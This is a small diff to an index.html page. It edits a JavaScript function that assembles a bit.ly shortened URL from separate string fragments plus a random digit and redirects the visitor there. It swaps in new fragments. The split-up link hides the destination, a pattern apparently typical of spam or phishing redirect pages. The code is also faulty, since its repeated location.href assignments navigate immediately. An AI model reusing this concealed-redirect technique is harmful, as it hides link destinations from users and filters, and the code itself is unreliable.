--- a/index.html
+++ b/index.html
@@ -1,10 +1,9 @@
-
 <script type = "text/javascript">
 function reDirect() {
 a = location.href = "bit.ly/";
-b = location.href = "ma3a";
-c = location.href = "naaa";
-d = Math.ceil(Math.random() * 2);
+b = location.href = "orlink";
+c = location.href = "2020v";
+d = Math.ceil(Math.random() * 1);
 a = "http://" + a + b + c + d ;
 window.location = a
 }
